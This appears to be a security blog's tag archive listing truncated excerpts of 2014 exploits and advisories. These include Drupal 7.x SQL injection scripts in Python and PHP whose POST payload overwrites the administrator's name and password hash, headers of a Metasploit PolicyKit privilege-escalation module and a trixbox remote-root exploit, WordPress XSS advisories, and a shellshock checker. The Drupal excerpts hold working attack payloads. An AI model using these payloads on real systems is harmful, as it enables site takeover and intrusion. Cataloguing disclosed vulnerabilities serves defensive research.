Tags archives: security

 

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

Linux PolicyKit Race Condition Privilege Escalation

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking   include Msf::Exploit::EXE include Msf::Post::File   include Msf::Exploit::Local::Linux   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Linux PolicyKit Race Condition Privilege Escalation’, ‘Description’ => %q( A race condition flaw was found in the PolicyKit pkexec [...]

 

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # [...]

 

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication: September 24, 2014 [without technical details]
Vendor Notification: September 24, 2014
Vendor Patch: October 2, 2014
Public Disclosure: October 15, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low
CVSSv2 Base [...]

 

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication: September 24, 2014 [without technical details]
Vendor Notification: September 24, 2014
Vendor Patch: September 29, 2014
Public Disclosure: October 15, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: [...]

 

Mozilla browser mem disclosure bugs (CVE-2014-1580)

REFERENCE: https://access.redhat.com/security/cve/CVE-2014-1580
CVE-2014-1580
Impact: Moderate
Public: 2014-10-14
Bugzilla: 1152362: CVE-2014-1580 Mozilla: Further uninitialized memory use during GIF rendering (MFSA 2014-78)
Public POC: First of all, CVE-2014-1580 (MFSA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>. [...]

 

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
# Risk: High
# CWE number: CWE-89,CWE-79
# Date: 13/10/2014
# Vendor: www.jttel.com.tw
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable files: news.php ; [...]

 

bashcheck local shellshock checker

#!/bin/bash

warn() {
	if [ "$scary" == "1" ]; then
		echo -e "\033[91mVulnerable to $1\033[39m"
	else
		echo -e "\033[93mFound non-exploitable $1\033[39m"
	fi
}

good() {
	echo -e "\033[92mNot vulnerable to $1\033[39m"
}

tmpdir=`mktemp -d -t tmp.XXXXXXXX`

[ -n "$1" ] && bash=$(which $1) || bash=$(which bash)
echo -e "\033[95mTesting $bash ..."
[...]